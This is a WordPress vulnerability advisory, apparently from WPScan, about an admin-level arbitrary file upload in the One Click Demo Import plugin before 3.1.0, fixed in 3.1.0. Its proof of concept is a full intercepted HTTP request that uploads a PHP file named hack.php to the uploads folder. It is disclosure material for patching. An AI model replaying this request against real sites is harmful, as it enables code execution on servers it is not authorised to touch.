WordPress Plugin Vulnerabilities
One Click Demo Import < 3.1.0 - Admin+ Arbitrary File Upload
Description
The plugin does not validate the imported file, allowing high privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed
Proof of Concept
Access Tools > Import > One Click Demo Import > Run Importer and import dummy XML file (can be empty) Intercept the request made and change the filename as well as content: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------18228892847416541933274753306 Content-Length: 507 Connection: close Cookie: [admin+] -----------------------------18228892847416541933274753306 Content-Disposition: form-data; name="action" ocdi_upload_manual_import_files -----------------------------18228892847416541933274753306 Content-Disposition: form-data; name="security" e35089cb91 -----------------------------18228892847416541933274753306 Content-Disposition: form-data; name="content_file"; filename="hack.php" Content-Type: text/xml <?php phpinfo();?> -----------------------------18228892847416541933274753306-- The file will be at https://example.com/wp-content/uploads/<year>/<month>/hack.php
Affects Plugins
Fixed in 3.1.0 References
Miscellaneous
Original Researcher
YICHENG LIU-ZTE CHENFENG lab
Submitter
YICHENG LIU-ZTE CHENFENG lab
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-21 (about 2 years ago)
Added
2022-03-21 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)
WPScan 